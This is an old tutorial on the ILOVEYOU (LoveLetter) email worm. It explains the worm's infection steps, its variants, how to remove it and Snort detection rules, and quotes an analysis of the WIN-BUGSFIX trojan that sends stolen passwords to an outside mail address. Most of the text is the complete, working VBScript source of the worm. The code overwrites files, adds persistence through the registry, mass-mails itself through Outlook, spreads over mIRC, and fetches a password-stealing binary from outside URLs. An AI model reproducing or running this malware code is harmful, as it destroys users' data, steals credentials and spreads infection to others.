_____________________________________________________________________________ The Love Letter and it's variants By Ankit Fadia ankit@bol.net.in _____________________________________________________________________________ The Love Bug has hit almost 10 billion users within less than a weak of its existence. The Damage done by it is considered to be more than that done by Melissa. It is considered to be one of the all time greats in the Virus history with around 13 variants already on loose. The worm spreads through email and IRC and has been written in Vbscript. Hence it infects only those Windows users that have Windows Scripting Host installed.(This would mean users who have IE 5.0 installed on a Win98, Win95 system or Win98 with Active Desktop Update installed are vulnerable.) Again it uses Outlook Express to send itself to all email addresses in the Address Book. The Virus arrives with a .vbs file attachment. The Subject and Body of the Virus vary as there are more than 13 variants of this worm. For Complete List of Variants and the Subjects and Bodies associated with them refer to The Love Bug Track at the end of this document. The actual virus spreads with the Subject: ILOVEYOU Body: kindly check the attached LOVELETTER coming from me. Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs Notice the .TXT part in the attachment name. This has been possibly done to fool users into assuming that the attached file is only a safe to use text document. In reality the attachment is a dangerous snippet of VbScript code. Once executed, the virus checks to see if the following key is set to a positive number or not. HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout If it is set to a positive number then it is changed to zero. If this key is not present then it is not affected. Then the worm copies itself to three different locations-: 1. In the C:\windows\system directory as MSKernel32.vbs 2. In the C:\windows\system directory as LOVE-LETTER-FOR-YOU.TXT.vbs 3. In the C:\windows directory as Win32DLL.vbs. Note: If Windows has been installed in any other directory like say for example, C:\Win then the above folders will change accordingly. ('C:\win\system\' and 'c:\win' would be the directories where the worm copies itself. It then creates new entries in the Registry to execute these programs automatically when Windows starts. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DL L This means that on bootup, the C:\windows\system\MSKernel32 and the C:\windows\ Win32DLL.vbs files which were earlier created by the worm are executed. It then modifies the Home Page or the Start Page of Internet Explorer to point to a pre defined page from which it downloads a binary called WIN-BUGSFIX.exe. To do this it edits the HKCU\Software\Microsoft\Internet Explorer\Main\StartPage key which folds the default IE home page and points it to any of the following URL's. [ It chooses randomly from the below list.] http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvs df7679njbvYT/WI N-BUGSFIX.exe http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hj k4jnHHGbvbmKLJKjh kqj4w/WIN-BUGSFIX.exe http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3 Vbvg/WIN- BUGSFIX.exe http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdj hPhjasfdglk NBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe The worm then changes a number of registry keys to run the downloaded binary. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI X = > (download directory)\win-bugsfix.exe It then edits the Registry to change the home page of Internet Explorer to the default blank page. HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page about:blank It then creates an HTML file named: LOVE-LETTER-FOR-YOU.HTM, which contains the following text: This HTML file need ActiveX Control To Enable to read this HTML file - Please press |YES| button to Enable ActiveX The ActiveX then edits the registry entries to make it run at boot and writes to the files as it did earlier. This file is also used by the worm to spread itself. It is this file that is DCC' ed to users on IRC. The worm then opens a MAPI connection to Outlook Express and sends itself to all entries in the Outlook Address Book. The virus attaches the file, LOVE-LETTER-FOR-YOU.TXT.vbs to these emails. Then it searches all drives and starts doing the damage. It looks for the files with the following extensions on both local and remote drives: .vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg, .wav, .txt, .gif, .doc, .htm, .html, .xls, .ini, .bat, .com, .mp3, and .mp2. All files with the extensions .vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, or .jpeg are replaced with a copy of the Virus itself. A copy of the Virus is also written to the name of the file with the extension .vbs. This means that say there is a file ankit.bmp then the virus copy is also saved as ankit.bmp.vbs The virus does not delete files with the extension .mp2 or .mp3. It merely changes the attributes of such files to hidden and creates a copy of itself with the filename of the mp2 or mp3 having the extension .vbs For example, if there is a file ankit.mp3 then the virus also copies itself to ankit.mp3.vbs. it also overwrites .jpg and .jpeg files and changes the extension name. The it looks for the mIRC windows IRC client and if found, overwrites the script.ini file such the it will DCC the LOVE-LETTER-FOR-YOU.HTM file to all people who join the IRC channel. Protection Firstly do not open any attachments with the extension .vbs even if the email appears to be from a trusted source instead delete the email. Also do not accept any DCC's from anyone, again not even from a trusted source. OK you are infected, how do you disinfect your system? Simply follow the below procedure: NOTE: This removal procedure may cause loss of some useful .vbs files as well First of all Remove the following registry entries HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi n32DLL HKCU\Software\Microsoft\Internet Explorer\Main\Start Page Remove all instances of the following files on all drives, both local and remote: LOVE-LETTER-FOR-YOU.HTM *.vbs *.vbs *.vbe *.js *.jse *.css *.wsh *.sct *.hta Locate your .mp2 and .mp3 files and remove the Hidden attribute. System Administrators should filter out all mail going to: MAILME@SUPER.NET.PH and also prevent the downloading of the WIN-BUGFIX.exe. [This has something to do with the HTTP Proxy and Sendmail Rules. Read about it at the URL: http://www2.sendmail.com/loveletter and also check out http://biocserver.cwru.edu/~jose/iloveyouhack.txt] I picked up the following rules that will filter out the Virus, from a posting to a site, however they seem to be incomplete alert tcp any 110 -> any any (msg:"Incoming Love Letter Worm"; content:"rem barok -loveletter"; content:"@GRAMMERSoft Group";) alert tcp any 143 -> any any (msg:"Incoming Love Letter Worm"; content:"rem barok -loveletter"; content:"@GRAMMERSoft Group";) alert tcp any any -> any 25 (msg:"Outgoing Love Letter Worm"; content:"rem barok -loveletter"; content:"@GRAMMERSoft Group";) WIN-BUGSFIX.exe Explained The binary Executable part of the worm which it downloads from the net is a password stealing Trojan sort of utility. The following is an excerpt from a posting to Bugtraq which describes the working of this Password Stealing Trojan associated with this worm. On startup the trojan tries to find a hidden window named 'BAROK...'. If it is present, the trojan exits immediately, if not - the main routine takes control. The trojan checks for the WinFAT32 subkey in the following Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run If the WinFAT32 subkey key is not found, the trojan creates it, copies itself to \Windows\System\ directory as WINFAT32.EXE and then runs the file from that location. The above registry key modification makes the trojan become active every time Windows starts. Then the trojan sets Internet Explorer startup page to 'about:blank'. After that the trojan tries to find and delete the following keys: Software\Microsoft\Windows\CurrentVersion\Policies\Network\HideSharePwds Software\Microsoft\Windows\CurrentVersion\Policies\Network\DisablePwdCaching .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network\HideShar ePwds .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network\DisableP wdCaching Then trojan registers a new window class and creates a hidden window titled 'BAROK...' and remains resident in Windows memory as a hidden application. Immediately after startup and when timer counters reaches the certain values, the trojan loads MPR.DLL library, calls WNetEnumCashedPasswords function and sends stolen RAS passwords and all cached Windows passwords to 'mailme@super.net.ph' e-mail address that most likely belongs to trojan's author. The trojan uses the 'smpt.super.net.ph' mail server to send e-mails. The e-mail's subject is 'Barok... email.passwords.sender.trojan'. " If you need to disinfect systems without having up-to-date antivirus software, Magnus Hiie of mega.ee also provided what appears to be a fix for this - handy if hundreds of computers at your network need to be disinfected quickly before more damage is done. It is attached to this mail as "disinfect_vbs.txt" (in order not to trigger trojan autolaunch...). The WIN-BUGSFIX.exe program connects to the SMPT server at 199.108.232.1 port 25 to send out its email message. You should block the address at your firewall. The message looks as follow: To: mailme@super.net.ph Subject: Barok... email.passwords.sender.trojan X-Mailer: Barok... email.passwords.sender.trojan---by: spyder Host: kakker Username: Default IP Address: 10.67.101.123 RAS Passwords: Cache Passwords: BLABLA\MPM : xxx BJORN\MUSIC : xxx TOM\SHARED : xxx TOM2\MP3 : xxx www.server.com/ : xxx:xxx MAPI : MAPI where all xxx's stand for plaintext usernames and passwords of SMB shares in the subnet. The Love Bug Reference Section The following is the general description of the variants of the Love Bug-: VBS.LoveLetter.A ATTACHMENT: LOVE-LETTER-FOR-YOU.TXT.vbs SUBJECT LINE: ILOVEYOU MESSAGE BODY: kindly check the attached LOVELETTER coming from me. VBS.LoveLetter.B or Lithuania ATTACHMENT: same as A SUBJECT LINE: Susitikim shi vakara kavos puodukui... MESSAGE BODY: same as A VBS.LoveLetter.C or Very Funny ATTACHMENT: Very Funny.vbs SUBJECT LINE: fwd: Joke MESSAGE BODY: empty VBS.LoveLetter.D or BugFix ATTACHMENT: same as A SUBJECT LINE: same as A MESSAGE BODY: same as A INFO: registry entry: WIN- -BUGSFIX.exe instead of WIN-BUGSFIX.exe VBS.LoveLetter.E or Mother's Day ATTACHMENT: mothersday.vbs SUBJECT LINE: Mothers Day Order Confirmation MESSAGE BODY: We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep it in a safe place.Thanks Again and Have a Happy Mothers Day! mothersday@subdimension.com INFO: mothersday.HTM sent in IRC, & comment: rem hackers.com, & start up page to hackes.com, l0pht.com, or 2600.com VBS.LoveLetter.F or Virus Warning ATTACHMENT: virus_warning.jpg.vbs SUBJECT LINE: Dangerous Virus Warning MESSAGE BODY: There is a dangerous virus circulating. Please click attached picture to view it and learn to avoid it. INFO: Urgent_virus_warning.htm VBS.LoveLetter.G or Virus ALERT!!! ATTACHMENT: protect.vbs SUBJECT LINE: Virus ALERT!!! MESSAGE BODY: a long message regarding VBS.LoveLetter.A INFO: FROM support@symantec.com. This variant also overwrites files with .bat and .com extensions. VBS.LoveLetter.H or No Comments ATTACHMENT: same as A SUBJECT LINE: same as A MESSAGE BODY: same a A INFO: the comment lines at the beginning of the worm code have been removed. VBS.LoveLetter.I or Important! Read carefully!! ATTACHMENT: Important.TXT.vbs SUBJECT LINE: Important! Read carefully!! MESSAGE BODY: Check the attached IMPORTANT coming from me! INFO: new comment line at the beginning: by: BrainStorm / @ElectronicSouls. It also copies the files ESKernel32.vbs & ES32DLL.vbs, and MIRC script comments referring to BrainStorm and ElectronicSouls and sends IMPORTANT.HTM to the chat room. VBS.LoveLetter.J ATTACHMENT: protect.vbs SUBJECT LINE: Virus ALERT!!! MESSAGE BODY: Largely the same as the G variant. INFO: This appears to be a slight modification of the G variant. VBS.LoveLetter.K ATTACHMENT: Virus-Protection-Instructions.vbs SUBJECT LINE: How to protect yourself from the IL0VEY0U bug! MESSAGE BODY: Here's the easy way to fix the love virus. VBS.LoveLetter.L or I Cant Believe This!!! ATTACHMENT: KillEmAll.TXT.VBS SUBJECT LINE: I Cant Believe This!!! MESSAGE BODY: I Cant Believe I have Just Recieved This Hate Email .. Take A Look! INFO: comment has phrase/words: Killer, by MePhiston, replaces GIF & BMP instead of JPG & JPEG, hides WAV & MID instead of MP3 & MP2. NO IRC routine, there it will not infect chat room users. Copies KILER.HTM, KILLER2.VBS, KILLER1.VBS to the hard disk. VBS.LoveLetter.M or Arab Air ATTACHMENT: ArabAir.TXT.vbs SUBJECT LINE: Thank You For Flying With Arab Airlines MESSAGE BODY: Please check if the bill is correct, by opening the attached file INFO: Replaces DLL & EXE files instead of JPG & JPEG. Hides SYS & DLL files instead of MP3 & MP2. Copies no-hate-FOR-YOU.HTM to the hard disk. ##############Source Code of LOVELETTER.vbs############## rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines 'Comments begining with ' added by The Hidden May 4 2000 On Error Resume Next dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") 'check the time out value for WSH rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then ' Set script time out to infinity wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD" end if 'Create three copies of the script in the windows, system32 and temp folders Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") 'Set IE default page to 1 of four locations that downloads an executable. 'If the exectuable has already been downloaded set it to run at the next login and set IE's start page to be blank regruns() 'create an html file that possibly runs an activex component and runs one of the copies of the script html() 'Resend script to people in the WAB spreadtoemail() 'overwrite a number of file types with the script 'if the files are not already scripts create a script file with the same name with vbs extention and 'delete the original file 'mirc client have a script added to send the html file created earlier to a channel listadriv() end sub sub regruns() On Error Resume Next Dim num, downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",di rsystem&"\MS Kernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32D LL",dirwin&"\ Win32DLL.vbs" downread = "" downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread = "") then downread = "c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe") = 1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw658 7345gvsdf7679njbv YT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe5467 86324hjk4jnHHGbvbm KLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhf gER67b3Vbvg/ WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgq werasdjhPhjasfdgl kNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread & "\WIN-BUGSFIX.exe") = 0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path & "\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext = fso.GetExtensionName(f1.path) ext = lcase(ext) s = lcase(f1.name) if (ext = "vbs") or (ext = "vbe") then set ap = fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext = "js") or (ext = "jse") or (ext = "css") or _ (ext = "wsh") or (ext = "sct") or (ext = "hta") then set ap = fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname = fso.GetBaseName(f1.path) set cop = fso.GetFile(f1.path) cop.copy(folderspec & "\" & bname & ".vbs") fso.DeleteFile(f1.path) elseif(ext = "jpg") or (ext = "jpeg") then set ap=fso.OpenTextFile(f1.path, 2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path & ".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3 = fso.CreateTextFile(f1.path & ".vbs") mp3.write vbscopy mp3.close set att = fso.GetFile(f1.path) att.attributes = att.attributes + 2 end if if (eq<>folderspec) then if (s = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or _ (s = "script.ini") or (s = "mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER- FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget = regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad set regedit = CreateObject("WScript.Shell") set out = WScript.CreateObject("Outlook.Application") set mapi = out.GetNameSpace("MAPI") for ctrlists = 1 to mapi.AddressLists.Count set a = mapi.AddressLists(ctrlists) x = 1 regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a) if (regv = "") then regv = 1 end if if (int(a.AddressEntries.Count) > int(regv)) then for ctrentries = 1 to a.AddressEntries.Count malead = a.AddressEntries(x) regad = "" regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead) if (regad = "") then set male = out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD" end if x = x + 1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out = Nothing Set mapi = Nothing end sub sub html On Error Resume Next dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6 dta1= "LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@- @ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@- @>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#- #LOVE- LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR- YOU.HTM#- #,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>---------- z------------ --------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2= "set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^- ^Windows^- ^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'") dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """") dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/") dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\") dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'") dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """") dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/") dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\") set fso = CreateObject("Scripting.FileSystemObject") set c = fso.OpenTextFile(WScript.ScriptFullName, 1) lines = Split(c.ReadAll, vbcrlf) l1 = ubound(lines) for n = 0 to ubound(lines) lines(n)=replace(lines(n), "'", chr(91) + chr(45) + chr(91)) lines(n)=replace(lines(n), """", chr(93) + chr(45) + chr(93)) lines(n)=replace(lines(n), "\", chr(37) + chr(45) + chr(37)) if (l1 = n) then lines(n) = chr(34) + lines(n) + chr(34) else lines(n) = chr(34) + lines(n) + chr(34) & "&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines, vbcrlf) d.write vbcrlf d.write dt6 d.close end sub ##############SOURCE CODE OF LOVELETTER.VBS########## Ankit Fadia ankit@bol.net.in To receive manuals on everything you ever dreamt of written by Ankit Fadia, join his mailing list by sending an email to: programmingforhackers-subscribe@egroups.com